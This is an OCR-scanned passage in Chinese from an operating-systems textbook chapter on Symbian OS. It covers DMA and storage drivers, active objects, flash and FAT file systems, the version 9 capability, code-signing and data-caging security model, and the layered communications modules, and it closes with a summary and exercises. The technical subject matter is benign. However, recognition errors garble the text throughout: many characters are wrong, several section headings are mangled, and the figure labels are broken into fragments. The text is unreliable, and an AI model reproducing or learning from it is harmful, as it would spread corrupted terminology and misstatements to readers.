125.3 直接 存储 需 访 问 


设备 驱动 经 常 使 用 DMA，Symbian 操 作 系 统 支 持 DMA 人 硬件 的 使 
用 。DMA 硬 件 包 含 一 个 控制 一 系列 DMA 通 道 的 控制 器 。 每 个 通道 提 
供 内 存 和 设备 间 的 单一 方 同 的 通信 ， 因 此 ， 数 据 的 双 疝 传输 需要 两 个 
DMA 通 道 。 人 至 少 有 一 对 DMA 通 道 是 专用 于 显示 LCD 控 制 器 的 。 此 


外 ， 大 多 数 平台 提供 一 定数 量 的 常规 DMA 通 道 。 


一 旦 一 个 设备 把 数据 传送 到 内 存 ， 就 会 激发 一 个 系统 中 断 。PDD 
为 了 传输 设备 使 用 DMA 硬 件 提供 的 DMA 服 务 ， 这 里 传输 设备 是 指 与 
硬件 接口 的 设备 驱动 的 一 部 分 。 在 PDD 与 DMA 控 制 器 之 间 ，Symbian 
操作 系统 实现 两 层 软件 ， 一 个 软件 的 DMA 层 ， 一 个 与 DMA 人 硬件 接口 
的 内 核 扩 展 。DMA 层 把 自身 分 成 平台 独立 层 和 台 相 关 层 。 作 为 内 核 扩 
展 ，DMA 层 在 引 守 进程 中 是 内 核 局 动 的 第 一 批 设备 驱动 的 一 个 。 


由 于 特殊 的 原因 ， 对 DMA 的 文 持 是 比较 复杂 的 。Symbian 操 作 系 
统 支 持 许多 不 同 的 硬件 配置 ， 但 是 没有 提供 缺 省 的 DMA 配 置 。 与 
DMA 硬 件 的 接口 是 标准 化 的 ， 由 平台 无 关 层 来 提供 。 平 台 相 关 层 和 内 
核 扩 展 由 生产 三 商 提供 ， 这 样 Symbian 操作 系统 就 如 对 其 他 设备 一 样 
处 理 DMA 人 硬件 ， 在 LDD 和 PDD 构 件 中 具有 设备 驱动 。 由 于 DMA 人 硬件 


本 身 是 一 个 设备 ， 并 且 它 并 行 了 Symbian 操 作 系 统 支 持 所 有 设备 的 方 
式 ， 因 此 这 种 实现 文 持 的 方式 是 合理 的 。 


12.5.4 ”特殊 情况 ， 存储 介质 


Symbian 操 作 系 统 中 存储 介质 驱动 是 PDD 的 一 种 特殊 形式 ， 文 件 
服务 器 排他 地 使 用 它们 来 实现 对 存储 介质 设备 的 访问 。 因 为 智能 手机 
既 可 以 容纳 固定 的 存储 介质 也 可 以 容纳 移动 的 存储 介质 ， 所 以 存储 介 
质 驱 动 必须 识别 和 支持 多 种 形式 的 存储 介质 。Symbian 操 作 系 统 对 介 
质 的 支持 包括 一 个 标准 的 LDD 和 为 用 户 提供 的 接口 API。 


Symbian 操 作 系 统 中 的 文件 服务 右 能 够 同时 支持 多 达 26 个 不 同 的 
设备 。 本 地 设备 ， 像 在 Windows 中 一 样 ， 通 过 驱动 器 号 来 区 分 。 


12.5.5 BAZEI/O 


Symbian 操作 系统 通过 活动 对 象 处 理 阻塞 JO。 设 计 痢 认识 到 等 待 
1/O 事 件 的 所 有 线程 的 负荷 会 影响 系统 中 的 其 他 线程 这 一 事实 。 活 动 对 
象 使 得 阻塞 IO 调 用 可 以 由 操作 系统 来 处 理 ， 而 不 是 进程 目 身 。 活 动 对 
象 由 一 个 调度 妖 进 行 协调 并 且 在 一 个 单独 的 线程 中 执行 。 


当 活动 对 象 使 用 一 个 阻塞 O 调 用 时 ， 它 用 信和 号 通知 操作 系统 并 且 
把 目 身 挂 起 。 当 调用 完成 时 ， 操 作 系统 唤醒 挂 起 的 进程 ， 该 进程 如 同 
市 有 数据 返回 的 函数 一 样 继续 执行 。 区 别 只 是 对 于 活动 对 象 的 一 个 观 
点 : 它 不 能 调用 一 个 函数 并 期 竺 一 个 返回 值 ;， 它 必须 调用 一 个 特殊 的 
函数 并 且 使 该 函数 设置 阻塞 WO， 但 是 立刻 返回 。 操 作 系 统 接管 等 待 过 
程 。 


12.5.6 Hl) Man IE 


可 移动 存储 器 带 给 操作 系统 设计 人 员 一 个 有 趣 的 两 难处 境 。 当 往 
读 取 槽 插入 一 张 安全 数据 (Secure Digital, SD) 卡 时 ， 该 卡 就 同 其 他 
设备 一 样 成 为 一 个 设备 。 它 需要 一 个 控制 右 、 一 个 驱动 、 一 种 总 线 结 
构 ， 而 且 很 有 可 能 通过 DMA 与 CPU 进行 通信 。 然 而 ， 对 这 类 模型 移 除 
存储 介质 是 一 个 很 严重 的 问题 : 操作 系统 怎样 检测 插入 和 移 除 ? 这 一 
模型 如 何 适 应 一 张 介质 卡 的 不 存在 ?还 有 更 加 复杂 的 情况 ， 一 些 设备 
槽 能 够 兼容 不 止 一 种 类 型 的 设备 。 例 如 ， 一 张 SD 卡 ， 一 张 miniSD 卡 

( 带 有 适配器 ， 以 及 一 张 多 媒体 卡 都 使 用 同一 类 插 槽 。 


Symbian 操作 系统 使 用 可 移动 存储 万 的 很 多 共同 性 来 实现 对 它们 
的 文 持 。 每 种 可 移动 存储 器 通 肖 具有 如 下 特点 : 


1) 所 有 的 设备 必须 文 持 插入 和 移 除 。 


2) 所 有 的 可 移动 存储 大 能 够 “ 热 " 拔 ， 也 束 是 正在 使 用 时 被 拔 下 。 


val 


3) 每 种 介质 都 能 报告 它 目 己 的 容 
4) 必 须 拒绝 不 适 配 的 卡 。 


5) 每 种 卡 都 需要 电源 。 


为 了 文 持 可 移动 存储 器 ，Symbian 操 作 系 统 提供 控制 每 种 支持 卡 
片 的 软件 控制 器 。 这 些 控 制 问 和 设备 张 动 工作 在 一 起 ， 这 在 软件 层面 
上 也 是 一 样 的 。 当 一 张 卡 插入 时 ， 整 创建 了 一 个 套 接 字 对 象 ， 该 套 接 
字 对 象 构成 数据 流动 过 程 中 的 通道 。 为 了 适应 卡 状态 的 改变 ， 
Symbian 操作 系统 提供 了 一 系列 的 当 状 态 改 变 发 生 时 的 事件 。 设 备 张 
动 像 活 动 对 象 一 样 被 配置 用 来 监听 这 些 事件 并 作出 反应 。 


12.6 ”存储 系统 


和 所 有 面向 用 户 的 操作 系统 一 样 ，Symbian 操 作 系 统 有 一 个 文件 
系统 。 下 面 我 们 来 对 其 进行 描述 。 


12.6.1 移动 设备 文件 系统 


忠文 件 系 统 和 存储 而 言 ， 手 机 操作 系统 有 很 多 和 台式 机 操作 系统 
相同 的 需求 。 多 数 的 这 类 系统 都 实现 在 32 位 硬件 平台 上 ; 人 允许 用 户 以 
任意 的 名 字 命 名 文件 ， 大量 存储 文件 ， 需 要 一 定 的 组 织 结构 。 这 意味 
着 我 们 需要 一 个 分 层 的 、 基 于 目录 的 文件 系统 。 而 且 ， 手机 操作 系统 
设计 人 员 有 很 多 文件 系统 可 以 选择 时 ， 一 个 很 重要 的 特性 影响 了 他 们 
的 选择 ， 大 多 数 手 机 存储 介质 可 以 和 Windows 环 境 共 至 使 用 。 


如 打手 机 系统 中 没有 可 移动 存储 器 件 ， 则 任 一 种 文件 系统 都 是 可 
以 使 用 的 。 但 是 ， 对 于 使 用 内 存 作为 存储 的 系统 来 说 ， 还 有 特殊 的 情 
况 需 要 考虑 。 存 储 块 一 般 都 是 512 字 市 到 2048 子 市， 但 内 存 不 能 直接 修 
改 数据 记录 ， 而 需要 先 擦 除数 据 ， 然 后 才能 进行 写 入 。 男 外 ， 氛 除 的 
操作 很 不 精确 ， 每 次 探 除 不 能 只 探 除 一 个 字 节 ， 而 必须 擦 除 整个 块 。 
擦 除 速度 相对 比较 慢 。 


为 了 顺应 这 些 特征 ， 并 且 使 内 存 工作 效率 最 高 ， 需 要 文件 系统 能 
够 把 写 操作 分 散 到 整个 器 件 ， 以 及 解决 较 长 的 控 除 时 间 问 题 。 一 个 基 
本 的 概念 是 ， 当 文件 被 更 新 时 ， 文 件 系 统 会 将 文件 的 更 新 副本 写 入 空 
内 的 存储 块 并 修改 文件 指针 ， 而 在 有 空 内 时 间 时 再 进行 旧 数 据 块 的 回 
WERTE ° 


最 早 的 内 存 文 件 系 统 之 一 是 微软 公司 在 20 世 纪 90 年 代 初 为 MS- 
DOS 使 用 的 FFS2 文 件 系统 。 在 1994 年 PCMCIA 工 业 组 织 通过 了 关于 内 
存 的 闪存 传输 层 (Flash Translation Layer) 标准 后 ， 闪 存 器 件 可 以 被 识 
别 为 一 个 FAT 文 件 系统 。Linux 同 时 也 专门 为 闪存 设计 了 JFFS 
(Journaling Flash File System) 和 YAFFS (Yet Another Flash Filing 
System) 两 种 文件 系统 。 


但 是 ， 移 动 平 台 必 须 和 其 他 计算 机 共享 存储 介质 ， 这 就 要 求 必 须 
有 一 定 的 兼容 措施 。FAT 文 件 系 统 是 最 常用 到 的 。 而 且 ， 由 于 与 FAT- 
32 相 比 ，FAT-16 有 着 较 小 的 分 配 表 以 及 长 文件 的 简化 用 法 ， 所 以 FAT- 
16 的 使 用 更 为 广泛 。 


12.6.2 ”Symbian 操作 系统 文件 系统 


作为 智能 手机 操作 系统 ，Symban OS 至 少 需 要 实现 FAT-16 文 件 系 
统 。 实 际 上 ， 它 的 确 支 持 FAT-16， 并 在 大 多 数 存 储 介 质 上 使 用 。 


但 是 ，Symbian 操 作 系 统 文件 服务 右 古 建立 在 一 个 类 似 Linux 的 虚 
拟 文 件 系 统 的 抽象 层 上 的 。 面 向 对 象 技术 允许 多 种 文件 系统 的 实现 代 
码 作 为 文件 服务 器 的 插件 使 用 ， 于 是 允许 同时 使 用 多 种 文件 系统 。 多 
种 文件 系统 的 实现 代码 可 以 在 一 个 文件 服务 右 中 共存 。 


Symbian 操作 系统 也 文 持 NFS 和 SMB 文 件 系 统 。 


12.6.3 ”文件 系统 安全 和 保护 


智能 手机 安全 


只 关注 和 文件 系统 安全 有 关 的 特征 ， 其 他 方面 将 在 下 一 节 中 进行 讨 


论 。 


考虑 到 智能 手机 的 环境 ， 它 们 属于 单 用 户 设备 ， 不 需要 在 使 用 前 
进行 用 户 认 证 。 一 个 手机 用 户 可 以 执行 应 用 程序 、 拨 打 电 话 、 访 问 网 
络 ， 全 都 不 需要 用 户 认 证 。 在 这 样 的 环境 下 ， 使 用 基于 权限 的 安全 措 
施 是 很 有 挑战 性 的 ， 因 为 缺乏 认证 机 制 意味 着 只 有 一 组 权限 可 以 使 
用 ， 即 所 有 人 使 用 同样 的 一 组 权限 。 


除了 权限 ， 安 全 经 常 受 益 于 其 他 形式 的 信息 。 在 Symbian 操 作 系 

统 版 本 9 或 更 新 的 版 本 中 ， 应 用 程序 在 安装 时 束 已 家 指定 了 其 行为 能 
(授予 一 个 应 用 程序 权限 的 机 制 将 在 下 一 节 涉 及 ) 。 一 个 应 用 程序 在 
请 求 执 行 某 项 行为 时 ， 其 行为 能 力 集 将 被 检查 。 如 果 这 种 访问 在 行为 
能 力 集中 存在 ， 访 问 和 被 许可 ， 否 则 被 拒绝 。 行 为 能 力 检查 会 造成 一 些 
系统 开销 一 一 每 次 涉及 到 访问 资源 的 系统 调用 都 需要 进行 检查 一 一 但 


仿 碍 一 个 文件 的 所 有 者 是 否 匹 配 的 开销 会 更 长 。 这 个 折 中 在 Symbian 
操作 系统 中 效果 很 好 。 


Symbian 操作 系统 中 还 有 一 些 其 他 形式 的 文件 安全 。 在 Symbian 操 
作 系 统 的 存储 器 件 中 有 特定 的 区 域 ， 需 要 有 特定 权限 的 应 用 程序 才能 
访问 。 这 种 特定 的 权限 只 将 安装 程序 赋予 了 应 用 程序 。 这 样 做 的 效 末 
征 ， 痢 安 半 的 应 用 程序 在 安装 完成 后 即 被 保护 ， 不 受 任何 非 系统 的 访 
H 〈 和 意味 着 非 系统 的 恶意 程序 ， 如 病毒 ， 不 能 感染 已 经 安装 的 程 
序 ) 。 男 外 ， 文 件 系统 预 留 了 专门 保存 应 用 程序 产生 的 特殊 数据 的 区 
域 (这 被 称 作 数据 锁定 ， 见 下 一 他) 。 


对 Symbian 操作 系统 来 说 ， 权 限 的 使 用 和 文件 所 有 者 在 保护 文件 
访问 上 的 效果 是 相当 的 。 


12.7 ”Symbian 操作 系统 的 安全 


智能 手机 提供 的 环境 很 难保 证 安全 。 像 我 们 之 前 提 到 的 ， 它 们 属 
于 单 用 户 设 备 ， 不 需要 在 使 用 基本 功能 前 进行 用 户 认证 。 更 复杂 的 功 
能 (如 应 用 软件 安装 ) 需要 授权 ， 但 不 需 认 证 。 然 而 ， 智 能 手机 上 执 
行 的 复杂 操作 系统 中 ， 有 很 多 途径 进行 数据 的 交换 (以 及 执行 程 
Fe) 。 在 这 样 的 环境 进行 安全 防护 变 得 很 复杂 。 


Symbian 操作 系统 很 好 地 体现 了 这 一 安全 难度 。 用 户 期 望 基于 
Symbian 操作 系统 的 智能 手机 人 允许 不 经 认证 即 可 任意 使 用 一 一 没有 登 录 
和 身份 鉴别 。 但 是 ， 你 肯定 经 历 过 ， 一 个 和 Symbian 操 作 系 统 同 样 复杂 
的 操作 系统 很 容易 受到 病毒 、 蠕 虫 和 其 他 恶意 软件 的 影响 。 在 Symbian 
操作 系统 版 本 9 以 前 的 版 本 中 ， 操 作 系统 提供 了 一 个 守门 人 式 的 安全 功 
能 :系统 询问 用 户 是 否 允 许 安 装 每 一 个 应 用 程序 。 这 种 设计 的 思维 
是 ， 只 有 用 户 自己 安装 的 程序 会 造成 系统 毁坏 ， 一 个 被告 知 的 用 户 会 
知道 他 所 要 安装 的 哪些 软件 是 恶意 软件 。 用 户 会 理智 地 使 用 它们 。 


守门 人 式 设计 有 很 多 优点 。 例 如 : 一 个 新 的 没有 用 户 自己 安装 的 
应 用 程序 的 智能 手机 是 一 个 可 以 无 故障 运行 的 系统 。 只 安装 用 户 认 为 
不 是 恶意 软件 的 程序 ， 即 可 保证 系统 的 安全 。 这 种 设计 的 问题 是 ， 用 
户 并 不 总 是 知道 安装 一 个 应 用 程序 的 全 部 后 果 。 存 在 伪装 成 有 用 的 应 


用 程序 的 病毒 ， 在 提供 有 用 功能 的 同时 静默 地 安装 恶意 代码 。 普 通用 
户 无 法 验证 所 有 软件 的 可 信 度 。 


Symbian 操作 系统 版 本 9 的 信任 验证 机 制 提 升 到 了 一 个 新 设计 的 平 
台 上 。 这 个 版 本 的 操作 系统 保留 原 有 的 守门 人 式 机 制 ， 但 是 在 用 户 之 
外 提供 了 对 安装 软件 进行 验证 的 机 制 。 每 个 软件 开发 者 现在 需要 人 负责 
通过 数字 签名 技术 来 验证 一 个 软件 是 由 其 编写 的 。 不 十 所 有 的 软件 部 
必须 有 这 样 的 验证 ， 只 有 需要 访问 特定 系统 资源 的 软件 需要 。 当 一 个 
应 用 软件 需要 数字 签名 时 ， 需 要 如 下 几 个 步骤 : 


TD) 软件 开发 者 需要 从 可 信 的 第 三 方 获得 一 个 三 商 ID， 这 些 可 信 的 


第 三 方 由 Symbian 来 进行 鉴定 。 


2) 当 一 个 开发 者 开发 了 一 个 程序 包 并 希望 发 布 时 ， 他 必须 将 其 提交 
到 可 信 的 第 三 方 进行 验证 。 开 发 者 提交 其 厂商 ID、 应 用 程序 以 及 该 应 
用 程序 访问 系统 的 方式 列表 。 


3) 可 信 第 三 方 验证 所 提供 的 访问 类 型 列表 是 完全 的 ， 而 且 没 有 其 他 
类 型 的 访问 发 生 。 如 果 该 可 信 第 三 方 可 以 进行 此 验证 ， 该 软件 即 由 可 
言 第 三 方 进行 签名 。 这 意味 着 安装 包 中 会 包含 一 些 特殊 的 信息 ， 详 细 


地 描述 该 软件 会 对 Symbian 操 作 系 统 做 出 什么 操作 。 


4) 该 安装 包 被 送 回 到 软件 开发 人 员 处 ， 并 可 以 发 放 给 用 户 。 需 要 注 
意 的 是 ， 这 个 方法 依赖 于 应 用 程序 如 何 访问 系统 资源 。 在 Symbian 操作 


el 


系统 中 ， 应 用 程序 必须 拥有 访问 一 个 资源 的 能 力 ， 才 会 允许 使 用 相应 
的 资源 。 这 种 行为 能 力 的 机 制 建立 在 Symbian 操作 系统 的 内 核 中 。 当 一 
个 进程 被 创建 时 ， 该 进程 的 进程 控制 块 的 一 部 分 用 来 记录 该 进程 被 授 
予 的 权限 。 当 进程 试图 使 用 它 不 能 使 用 的 权限 时 ， 该 访问 将 被 内 核 阻 
fe 


这 个 看 起 来 复杂 的 机 制 使 得 我 们 可 以 在 Symbian 操作 系统 中 建立 一 
个 自动 的 守门 人 式 机 制 ， 来 验证 要 安装 的 软件 。 安 装 过 程 检查 安装 包 
中 的 标识 。 如 果 该 标识 是 有 效 的 ， 该 应 用 程序 被 授予 的 权限 将 记录 下 
来 ， 同 时 可 以 在 执行 时 通过 内 核 的 检查 。 


图 12-3 中 的 图 描述 了 Symbian 操作 系统 版 本 9 中 的 信任 关系 。 需 要 
注意 的 是 ， 系 统 中 内 置 了 多 个 信任 等 级 。 有 些 应 用 软件 不 访问 任何 系 
统货 源 ， 故 而 也 不 需要 签名 。 一 个 例子 是 只 在 屏幕 上 显示 内 容 的 简单 
应 用 。 这 些 应 用 软件 不 被 也 不 需 被 信任 。 下 一 个 信任 级 别 是 用 户 级 签 
名 应 用 程序 级 。 这 些 应 用 程序 只 被 授予 其 需要 的 权限 。 第 三 个 信任 等 
级 由 系统 服务 组 成 。 同 用 户 级 应 用 程序 一 样 ， 这 些 服务 只 需要 特定 的 
权限 以 便 完 成 其 任务 。 在 一 个 如 同 Symbian 操 作 系统 的 微 内 核 体 系 结构 
中 ， 这 些 服务 运行 在 用 户 态 ， 并 像 用 户 程序 一 样 被 信任 。 最 后 ， 有 一 
类 程序 需要 系统 的 完全 信任 。 这 组 程序 拥有 修改 整个 系统 的 能 力 ， 并 
由 内 核 代码 组 成 。 


可 信 计 算 环境 ， 可 信 计 算 基 础 : 
系统 服务 以 不 同 的 权限 运行 具有 全 部 权限 修改 文件 系统 ， 
包括 内 核 、F32、SWInstall 


/ A MMF )\ \ THE SWInstall 是 
| | etel kernel, F32, SWinstall 一 一 守门 人 式 机 
二 oP) 制 的 执行 者 
N ~ esock si 
De = Ds 
已 签名 应 用 程序 : | = 
按照 其 声明 的 意图 进行 签名 未 签名 应 用 程序 : 
的 低 信 任 等 级 软件 不 影响 系统 环境 和 文件 系统 


的 不 可 信 应 用 程序 
图 12-3 Symbian 操作 系统 通过 信任 关系 来 保证 安全 


在 这 个 系统 中 有 若干 个 方面 看 起 来 值得 质疑 。 例 如 ， 这 样 复 洒 的 
机 制 真 的 有 必要 吗 (尤其 是 需要 伦 费 金钱 来 制作 的 情况 下 ) ? 结 
肯定 的 : Symbian 等 名 系统 代替 用 户 来 对 软件 进行 完整 性 验证 ， 并 且 该 
验证 必须 被 执行 。 这 一 机 制 看 起 来 可 能 会 带 来 开发 上 的 难度 。 是 否 每 
次 在 真实 物理 设备 上 进行 测试 都 需要 一 个 新 的 签名 的 安装 包 ? 为 了 解 
决 这 个 问题 ，Symbian 操 作 系统 识别 开发 人 员 的 特殊 签名 。 一 个 开发 人 
员 必 须 获 得 一 个 有 时 效 限制 〈 通 常 是 6 个 月 ) 的 证 书 和 一 个 特殊 的 智能 
手机 ， 即 可 使 用 自己 的 数字 证 书 来 创建 安装 包 。 


论 是 


除了 这 样 的 守门 人 式 机 制 外 ，Symbian 操 作 系 统 版 本 9 同时 采用 数 
据 锁定 (Data Caging) 技术 ， 来 组 织 特定 目录 下 的 数据 。 比 如 ， 可 执 


行 代码 只 存在 一 个 目录 中 ， 而 该 目录 只 对 软件 安装 程序 可 写 。 另 外 ， 
应 用 程序 只 能 在 一 个 目录 中 进行 写 操 作 ， 它 们 各 自 的 数据 不 能 被 其 他 
程序 访问 。 


12.8 Symbian 操作 系统 中 的 通信 


Symbian 操作 系统 按照 特殊 的 标准 设计 ， 并 使 用 客户 机 /服务 器 机 
制 和 基于 栈 的 配置 ， 以 事件 驱动 型 的 通信 为 特色 。 


12.8.1 基本 基础 结构 


Symbian 操作 系统 的 通信 系统 基础 结构 建立 在 基本 构件 之 上 。 考 
虑 如 图 12-4 中 所 示 的 一 个 非常 通用 的 模式 。 考 虑 把 这 个 图 作为 一 个 可 
组 织 模型 的 起 点 。 在 这 个 栈 的 压 层 是 物理 设备 ， 以 一 定 方式 链接 到 计 
算 机 。 这 个 设备 可 以 是 集成 在 通信 设备 中 的 手机 调制 解 调 絮 或 是 一 个 
蓝牙 无 线 电压 置 。 在 此 ， 我 们 不 关心 展 层 的 硬件 实现 ， 而 是 把 这 个 物 
理 设备 当做 一 个 会 以 合适 的 方式 啊 应 软件 发 出 的 命令 的 抽象 设备 。 


应 用 程序 层 


软 
2 件 
协议 实现 层 
设备 驱动 程序 层 
i tg 
物理 设备 
件 


图 12-4 Symbian 操作 系统 中 面向 块 的 通信 结构 


下 一 层 ， 即 我 们 需要 关心 的 第 一 层 ， 有 是 设备 驱动 层 。 我 们 已 经 指 
出 了 设备 驱动 的 结构 ， 这 一 层 的 软件 直接 通过 LDD 和 PDD 结 构 与 硬件 
配合 工作 。 这 一 层 的 软件 是 硬件 相关 的 ， 每 个 新 型 号 的 硬件 设备 都 需 
要 一 个 软件 的 设备 红 动 为 其 衔接 。 不 同 的 硬件 需要 不 同 的 设备 张 动 ， 
但 它们 都 为 上 层 提 供 同 样 的 接口 。 协 议 层 期 望 无 论 什么 样 的 硬件 部 具 
有 相同 的 接口 。 


下 一 层 就 是 协议 实现 层 ， 包 含 了 Symbian 操作 系统 所 文 持 的 各 种 
协议 的 实现 。 这 些 实现 承担 了 下 层 的 设备 驱动 接口 ， 并 向 上 面 的 应 用 
层 提供 了 一 个 单一 、 统 一 的 接口 。 这 就 是 提供 诸如 蓝牙 和 TCP/IP 协 议 
的 各 种 协议 的 部 分 


最 后 ， 应 用 程序 层 是 最 高 的 一 层 。 该 层 包含 了 需要 利用 通信 基础 
结构 的 应 用 程序 。 应 用 程序 不 清楚 通信 是 怎样 实现 的 ， 但 是 ， 该 应 用 
程序 需要 通知 操作 系统 它 需 要 使 用 哪个 具体 设备 。 一 旦 设备 束 位 ， 应 
用 程序 不 直接 访问 设备 ， 而 是 依赖 协议 实现 层 的 API 来 驱动 真实 便 
tee 


12.8.2 ”更 仔细 地 观察 基础 结构 


Symbian 操作 系统 的 一 个 更 详细 的 结构 如 图 12-5 所 示 。 这 个 图 基于 
12-4 的 通用 结构 ， 原 图 中 的 层 被 细 分 为 Symbian 操作 系统 中 使 用 的 可 
操作 单元 。 


应 用 程序 层 


| 用 户 端 代码 | 


CSY 通 信 模 块 〈 应 用 程序 层 ) 


协议 实现 层 
| MTM 模 块 | 


”逻辑 设备 驱动 程序 “| 
一 | 


12-5 Symbian 操作 系统 中 的 通信 设施 具有 一 组 丰富 的 功能 
1. 物 理 设备 


首 移 需要 注意 的 是 ， 物 理 设 备 层 没有 变化 。 如 我 们 之 前 所 述 ， 
Symbian 操 作 系 统 并 不 直接 控制 硬件 。 所 以 ， 它 兼容 所 有 符合 该 层 的 
API 设 计 的 硬件 ， 但 不 需 指定 人 硬件 本 身 是 如 何 设计 和 建造 的 。 这 一 点 
对 Symbian 操作 系统 和 其 开发 人 员 都 有 和 益 处。 通过 将 硬件 看 作 抽象 结 
构 并 通过 这 一 抽象 进行 通信 ，Symbian 操 作 系统 的 设计 人 员 保 证 了 
Symbian 操作 系统 可 以 广泛 地 兼容 现 有 设备 ， 同 时 适应 未 来 的 硬件 。 


2. 设 备 驱动 层 


如 图 12-5 所 示 ， 设 备 驱 动 层 锌 分 为 两 层 。 如 我 们 之 前 所 述 ，PPD 
层 通过 便 件 端口 直接 与 硬件 设备 进行 交互 。 而 LDD 层 与 协议 实现 层 交 
互 ， 实 现 了 Symbian 操作 系统 中 与 硬件 相关 的 策略 。 这 些 策略 包括 输 
入 输出 缓冲 、 中 断 机 制 和 流 挥 制 。 


3. 协 议 实现 层 


在 图 12-5 中 ， 协 议 实现 层 分 为 了 奉 干 子 层 。 在 协议 实现 层 中 使 用 
了 四 种 模块 ， 列 举 在 下 面 : 


-CSY 模 块 ， 协议 实 现 层 最 底层 钙 通 信服 务 ， 即 CSY 模 块 。 一 个 
CSY 模 块 直接 通过 设备 驱动 程序 的 PDD 部 分 与 硬件 通信 ， 实 现 了 协议 


的 许多 底层 特征 。 例 如 ， 一 个 协议 可 能 需要 同人 硬件 设备 传递 原始 妆 
据 ， 或 者 需要 在 传输 过 程 中 使 用 7 位 或 8 位 的 缓存 。 这 些 工 作 模 式 会 被 
CSY 模 块 处 理 。 


:TSY 模 块 ， 电 话 中 包含 了 很 大 一 部 分 通信 基础 结构 ， 这 些 功能 需 
要 由 特殊 的 模块 来 进行 实现 。 电 话 服 务 (TSY) 模块 实现 了 这 些 功 
能 。 基 本 的 TSY 可 能 在 很 多 的 硬件 上 文 持 标准 的 TSY， 例 如 拨打 和 切 
断 电 话 。 更 高 级 的 TSY 模 块 可 以 文 持 更 高 级 的 硬件 ， 比 如 文 持 GSM 功 


AB 
He ° 


PRT 模 块 : 协议 实现 层 的 核心 模块 是 协议 模块 (PRIT 模 块 ) 。 该 
模块 由 服务 器 用 来 实现 具体 的 协议 。 一 个 服务 器 在 试图 使 用 协议 的 时 
候 创建 一 个 PRT 模 块 的 实例 。 例 如 ，TCPIPPRT 模 块 中 实现 了 TCP/IP 相 
关 的 协议 。 蓝 牙 协 议 在 BT.PRT 模 块 中 实现 。 


"MTM: 由 于 Symbian 操作 系统 被 设计 用 来 处 理 短信 息 ， 设 计 人 员 
专门 为 处 理 的 所 有 类 型 的 短信 息 建 立 了 相应 的 机 制 ， 而 这 些 专 门 的 模 
块 称 为 信息 类 型 模块 (MTM 模 块 ) 。 短 信息 处 理 包括 多 个 方面 ， 
MTM 模 块 需要 处 理 所 有 这 些 需 求 。 用 户 界 面 类 MTM 模 块 需要 实现 多 
种 供用 户 查 看 和 处 理 短信 息 的 方式 ， 包 括 如 何 阅读 短信 息 ， 如 何 被 告 
知 短信 息 发 送 进 度 等 。 客 户 端 MTM 模 块 处 理 寻 址 、 创 建 、 回 复 短 信 
FA; 而 服务 器 并 MTM 模 块 需要 实现 面向 服务 右 的 相关 短信 息 管理 功 


能 ， 如 目录 管理 、 特 定 信 息 的 管理 等 。 


根据 所 使 用 通信 类 型 的 不 同 ， 这 些 模块 以 不 同 的 方式 彼此 依赖 。 
例如 ， 实 现 使 用 蓝牙 的 协议 ， 我 们 只 需要 物理 硕 件 上 层 的 PRT 模 块 即 
可 。 某 些 ITDA 协 议 也 是 如 此 。 而 基于 PPP 的 TCP/PP 实 现 则 需要 使 用 
PRT 模 块 、TSY 模 块 和 CSY 模 块 ， 不 基于 PPP 的 TCP/IP 协 议 则 不 需要 
TSY 模 块 和 CSY 模 块 ， 但 是 其 PRT 模 块 需要 直接 连接 到 网 络 设备 驱动 
Ee 


4. 结 构 模 块 化 


基于 模块 化 的 思想 在 这 样 一 个 栈 式 的 模型 实现 中 是 很 有 用 的 。 在 
这 个 分 层 的 设计 中 ， 从 例子 中 可 以 看 出 ， 抽 象 带 来 的 优势 是 很 明显 
的 。 考 虚 TCP/IP 协 议 的 实现 。 一 个 PPP 连 接 既 可 以 直接 使 用 CSY 模 
块 ， 也 可 以 选择 GSM 或 普通 调制 解 调 器 的 TSY 实 现 ， 后 者 实际 底层 仍 
由 CSY 模 块 来 实现 。 未 来 新 的 电话 技术 出 现 后 ， 当 前 的 结构 仍然 可 以 
起 作用 ， 我 们 只 需要 为 新 的 电话 实现 添加 一 个 TSY 模 块 。 另 外 ， 细 调 
TCP/IP 协 议 栈 不 需要 修改 任何 其 依赖 的 模块 ， 只 需要 简单 地 调整 
TCP/IP PRT 模 块 。 这 样 广泛 的 模块 化 意味 着 在 已 有 结构 上 很 容易 添加 
新 代码 、 丢 弃 旧 代码 ， 当 前 代码 的 修改 不 会 对 整个 系统 带 来 巨大 的 变 
化 ， 也 不 需要 大 量 的 重新 安装 。 


最 后 ， 图 12-5 在 应 用 层 添 加 了 子 层 。 应 用 程序 通过 CSY 模 块 和 协 
议 实现 层 中 的 协议 模块 进行 交互 。 虽 然 我 们 可 以 认为 这 些 模 块 属于 协 
议 实现 层 的 一 部 分 ， 但 更 清晰 的 表示 是 ， 这 些 模块 在 协助 应 用 程序 进 


行 操作 。 例 如 ， 在 使 用 红外 接口 将 短信 息 发 送 到 手机 的 过 程 中 ， 应 用 
程序 会 在 应 用 程序 中 使 用 IRCOMM CSY 模 块 ， 通 过 协议 实现 层 的 短信 
息 实现 模块 来 完成 。 同 样 ， 在 这 样 一 个 过 程 中 ， 模 块 化 带 来 了 很 大 的 
优势 ， 应 用 程序 可 以 关注 实现 其 擅长 的 功能 ， 而 不 是 通信 过 程 。 
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Symbian 操作 系统 是 一 个 为 智能 手机 平台 设计 的 面 回 对 象 的 操作 
系统 。 它 的 微 内 核 设计 只 提供 了 很 小 的 纳 核 ， 只 实现 了 最 快 和 最 简单 
的 内 核 功 能 。Symbian 操 作 系统 通过 客户 机 /服务 需 的 体系 结构 ， 将 对 
系统 唤 源 的 访问 分 配给 用 户 态 的 服务 器。Symbian 操 作 系统 虽然 是 为 
智能 手机 设计 的 ， 但 其 也 拥有 很 多 通用 操作 系统 的 特性 : 进程 和 线 
程 、 内 存 管理 、 文 件 系 统 文 持 、 丰 富 的 通信 文 持 。 同 时 ，Symbian 操 
作 系 统 也 实现 了 一 些 独特 的 特性 ， 比 如 ， 活 动 对 象 使 等 竺 外 部 事件 更 
为 迅速 、 没 有 虚拟 内 存 使 得 内 存 管 理 更 富有 挑战 性 、 文 持 面 问 对 象 的 
设备 驱动 程序 采用 双 层 抽象 结构 。 


习题 


1. 对 下 列 的 每 一 个 服务 ， 描 述 其 在 如 Symbian 操作 系统 这 样 的 微 内 
核 操作 系统 中 ， 是 在 用 户 态 还 是 内 核 态 执行 。 


调度 线程 的 执行 。 


-打印 一 个 文档 。 


DE ee es 


.管理 线程 对 屏幕 的 访问 。 


-在 短信 息 到 达 时 发 出 声音 


:中断 当前 执行 并 接听 电话 。 


2 列举 微 内 核 设计 带 来 的 三 个 效率 提升 。 


